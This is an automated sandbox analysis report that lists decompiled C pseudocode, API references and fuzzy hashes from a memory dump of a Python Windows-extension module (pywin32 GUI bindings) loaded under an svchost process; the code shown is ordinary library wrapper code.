                            						 *((short*)(_t79 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x1c)) + 0x10));
                            						 *((short*)(_t79 + 8)) = 0;
                            						_t80 = 0xffff;
                            						if( *(_t163 + 0x24) == 0) {
                            							if(_t101 == 0) {
                            								 *_t137 = 0;
                            								L21:
                            								_t80 = 0xffff;
                            								L22:
                            								_t138 =  &(_t137[0]);
                            								if( *(_t163 + 0x28) == 0) {
                            									if(_t152 == 0) {
                            										 *_t138 = 0;
                            									} else {
                            										 *_t138 = _t80;
                            										_t138 =  &(_t138[0]);
                            										 *_t138 = _t152;
                            									}
                            									L31:
                            									_t49 =  &(_t138[0]); // 0x12
                            									_t153 = _t49;
                            									_t117 = _t159;
                            									_t140 = _t153 - _t159;
                            									do {
                            										_t83 =  *_t117 & 0x0000ffff;
                            										_t117 =  &(_t117[1]);
                            										 *(_t140 + _t117 - 2) = _t83;
                            									} while (_t83 != 0);
                            									_t118 =  &(_t159[1]);
                            									do {
                            										_t84 =  *_t159;
                            										_t159 =  &(_t159[1]);
                            									} while (_t84 != 0);
                            									_t102 =  *(_t163 + 0x2c);
                            									_t142 = _t153 + ((_t159 - _t118 >> 1) + 1) * 2;
                            									if(( *_t102 & 0x00000040) == 0) {
                            										L41:
                            										_t120 = _t142 & 0x00000003;
                            										if(_t120 > 0) {
                            											_t142 = _t142 + 4 - _t120;
                            										}
                            										_t85 =  *(_t163 + 0x10);
                            										_t85[3] = _t102;
                            										_t85[2] = _t142 - _t102;
                            										return _t85;
                            									}
                            									_t121 = _t148;
                            									 *_t142 =  *((intOrPtr*)(_t163 + 0x20));
                            									_t144 = _t142 + 2;
                            									_t155 = _t144 - _t148;
                            									do {
                            										_t89 =  *_t121 & 0x0000ffff;
                            										_t121 =  &(_t121[1]);
                            										 *(_t155 + _t121 - 2) = _t89;
                            									} while (_t89 != 0);
                            									_t122 =  &(_t148[1]);
                            									do {
                            										_t90 =  *_t148;
                            										_t148 =  &(_t148[1]);
                            									} while (_t90 != 0);
                            									_t142 = _t144 + (_t148 - _t122 >> 1) * 2 + 2;
                            									goto L41;
                            								}
                            								_t123 = _t152;
                            								_t104 = _t138 - _t152;
                            								do {
                            									_t91 =  *_t123 & 0x0000ffff;
                            									_t123 =  &(_t123[1]);
                            									 *(_t104 + _t123 - 2) = _t91;
                            								} while (_t91 != 0);
                            								_t124 = _t152 + 2;
                            								do {
                            									_t92 =  *_t152;
                            									_t152 = _t152 + 2;
                            								} while (_t92 != 0);
                            								_t138 = _t138 + (_t152 - _t124 >> 1) * 2;
                            								goto L31;
                            							}
                            							 *_t137 = 0xffff;
                            							_t137 =  &(_t137[0]);
                            							 *_t137 = _t101;
                            							goto L22;
                            						}
                            						_t125 = _t101;
                            						_t94 = _t137 - _t101;
                            						 *(_t163 + 0x24) = _t94;
                            						_t162 = _t94;
                            						asm("o16 nop [eax+eax]");
                            						do {
                            							_t95 =  *_t125 & 0x0000ffff;
                            							_t125 =  &(_t125[1]);
                            							 *(_t125 + _t162 - 2) = _t95;
                            						} while (_t95 != 0);
                            						_t159 =  *(_t163 + 0x18);
                            						_t126 = _t101 + 2;
                            						do {
                            							_t96 =  *_t101;
                            							_t101 = _t101 + 2;
                            						} while (_t96 != 0);
                            						_t137 = _t137 + (_t101 - _t126 >> 1) * 2;
                            						goto L21;
                            					}
                            					_t127 = _t152;
                            					_t146 = _t127 + 2;
                            					do {
                            						_t97 =  *_t127;
                            						_t127 = _t127 + 2;
                            					} while (_t97 != 0);
                            					_t112 =  *(_t163 + 0x10);
                            					_t112[1] = _t112[1] + (_t127 - _t146 >> 1) + (_t127 - _t146 >> 1);
                            					goto L12;
                            				}
                            				_t130 = _t101;
                            				_t158 = _t130 + 2;
                            				asm("o16 nop [eax+eax]");
                            				do {
                            					_t99 =  *_t130;
                            					_t130 = _t130 + 2;
                            				} while (_t99 != 0);
                            				_t112 =  *(_t163 + 0x10);
                            				_t112[1] = _t136 + (_t130 - _t158 >> 1) * 2;
                            				goto L8;
                            			}

                            APIs
                            • GlobalAlloc.KERNEL32(00000042,?), ref: 6DAA457E
                            • GlobalLock.KERNEL32 ref: 6DAA458B
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Global$AllocLock
                            • String ID: MS Sans Serif
                            • API String ID: 15508794-168460110
                            • Opcode ID: 398235f2807453b9c96e23a6ed79d8a44bbc7ab2078aab5e379f98ad2e1b71d4
                            • Instruction ID: ad62fc54d206c283bb13eb686dfb4ac0668fffeafd087623e2af608249d66991
                            • Opcode Fuzzy Hash: 398235f2807453b9c96e23a6ed79d8a44bbc7ab2078aab5e379f98ad2e1b71d4
                            • Instruction Fuzzy Hash: 2971A23C5083038BC718CF28C491676B3B1FF89708B0986ADEC598B755EF71AA86C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyUnicode_AsUTF8.PYTHON38(?), ref: 6DAA6584
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z.PYWINTYPES38(?), ref: 6DAA65C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: FromObject_U_object@@Unicode_
                            • String ID: lfFaceName
                            • API String ID: 143151762-3321656176
                            • Opcode ID: 62477c445f2cb53ef53758508b7a258e6b661087c9c56733a64c48b6a6bec40e
                            • Instruction ID: a7a0ae4e5f4b72e080f77b68d4d8c466a831077a107d149c2c09d9b6a6d64e1d
                            • Opcode Fuzzy Hash: 62477c445f2cb53ef53758508b7a258e6b661087c9c56733a64c48b6a6bec40e
                            • Instruction Fuzzy Hash: 9AF0A7A950C6434BC7024B3889E53763F72AD03208B8C87A4D486C7326F323D499CFC6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA697F
                            • PyArg_ParseTuple.PYTHON38(?,O:set_logger,6DAC7CE0), ref: 6DAA69A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_DeallocParseTuple
                            • String ID: O:set_logger
                            • API String ID: 4076960995-743879522
                            • Opcode ID: ca6cb2d291372cc351702bbe169193b29425a571ac9d6fd85a6f3d16c22bad6a
                            • Instruction ID: b454c113ec4e842dcecf91d06bd37dd2e1bb40d18ac0fb6f590e77fb9d854dcf
                            • Opcode Fuzzy Hash: ca6cb2d291372cc351702bbe169193b29425a571ac9d6fd85a6f3d16c22bad6a
                            • Instruction Fuzzy Hash: 8DF0A97490C702DFDF00CF29C99472537B1BB46369B6C8355E861832A2DB31D897DEA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E6DAB1510(intOrPtr _a8) {
                            				void* _t2;
                            				void* _t5;
                            				int* _t6;
                            
                            				_t2 = _t5;
                            				__imp__PyArg_ParseTuple(_a8, "i:PostQuitMessage", _t2);
                            				_t6 = _t5 + 0xc;
                            				if(_t2 != 0) {
                            					PostQuitMessage( *_t6);
                            					 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
                            					return __imp___Py_NoneStruct;
                            				} else {
                            					return _t2;
                            				}
                            			}







                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,i:PostQuitMessage), ref: 6DAB151E
                            • PostQuitMessage.USER32 ref: 6DAB1530
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_MessageParsePostQuitTuple
                            • String ID: i:PostQuitMessage
                            • API String ID: 2622261543-1062443709
                            • Opcode ID: fc513e9b155b42d68ffae736bfe9234fc268fd28bac0ade12925eae631c3131e
                            • Instruction ID: 9c59b4f3f64365cd302b4ad7a07979c2a96b4c02a2dceeb85a0c30f18f377dd0
                            • Opcode Fuzzy Hash: fc513e9b155b42d68ffae736bfe9234fc268fd28bac0ade12925eae631c3131e
                            • Instruction Fuzzy Hash: E1D017B500C204DFCB059F25EC94A6577BAFB09306B148219FC93C2232D7318C6BEA12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • UnregisterDeviceNotification.USER32 ref: 6DAB8D77
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(UnregisterDeviceNotification,00000000), ref: 6DAB8D89
                            Strings
                            • UnregisterDeviceNotification, xrefs: 6DAB8D84
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: DeviceError@@NotificationU_object@@UnregisterWin_
                            • String ID: UnregisterDeviceNotification
                            • API String ID: 2969844099-351095452
                            • Opcode ID: 3e676bfceb063fb38124eba2a7668818e1a650cd3c658093563dd2988210f9be
                            • Instruction ID: 8dda2aa7d49a610af238c5488e3f90aafb2a399962eb33e80b65ae2b1829993e
                            • Opcode Fuzzy Hash: 3e676bfceb063fb38124eba2a7668818e1a650cd3c658093563dd2988210f9be
                            • Instruction Fuzzy Hash: 0BD05E361086015FC7210B1DEC08A267BBAEBC1231B15852AE40582220DB708C434B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E6DAB8D40(void* __ecx) {
                            				int _t3;
                            				int _t5;
                            				void* _t6;
                            
                            				_t6 = __ecx;
                            				_t3 = DeleteObject( *(__ecx + 0xc));
                            				_t5 = _t3;
                            				if(_t5 == 0) {
                            					__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("DeleteObject", _t3);
                            					_t3 = _t5;
                            				}
                            				 *((intOrPtr*)(_t6 + 0xc)) = 0;
                            				return _t3;
                            			}







                            APIs
                            • DeleteObject.GDI32(?), ref: 6DAB8D47
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(DeleteObject,00000000), ref: 6DAB8D59
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: DeleteError@@ObjectU_object@@Win_
                            • String ID: DeleteObject
                            • API String ID: 560238671-1531683806
                            • Opcode ID: 7c40c9340a3a71a7ed838bd3c547d0854255dc5324a50edba4ea6369ce6e252e
                            • Instruction ID: 8ca62d005477515a246b0107a8a8160b6ce207737555a7c57bd1e7eb2f2dfa23
                            • Opcode Fuzzy Hash: 7c40c9340a3a71a7ed838bd3c547d0854255dc5324a50edba4ea6369ce6e252e
                            • Instruction Fuzzy Hash: 19D05E361087016FDB210F19EC08A267BBAEFC1231B15852AE41592210DB709C428A61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB21B0(void* __eax, char* _a4, int _a8) {
                            
                            				__imp__PyArg_ParseTuple(_a8, ":CommDlgExtendedError");
                            				if(__eax != 0) {
                            					_a8 = CommDlgExtendedError();
                            					_a4 = "l";
                            					return __imp__Py_BuildValue();
                            				}
                            				return __eax;
                            			}




                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:CommDlgExtendedError), ref: 6DAB21B9
                            • CommDlgExtendedError.COMDLG32 ref: 6DAB21C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_CommErrorExtendedParseTuple
                            • String ID: :CommDlgExtendedError
                            • API String ID: 3890150268-2767658568
                            • Opcode ID: fb63904b445631715c1c24686672eec9f5b716bdd446aead1dd27fc68c663b0b
                            • Instruction ID: 6904a4575f55520e32ecbfcec532e7ef9f80f486402c69105d14d88d1f7b77ef
                            • Opcode Fuzzy Hash: fb63904b445631715c1c24686672eec9f5b716bdd446aead1dd27fc68c663b0b
                            • Instruction Fuzzy Hash: 9ED0C97850D301EFCB004F25D99836A7BB5BF85252F40C629F89881121E73588A38A13
                            Uniqueness

                            Uniqueness Score: -1.00%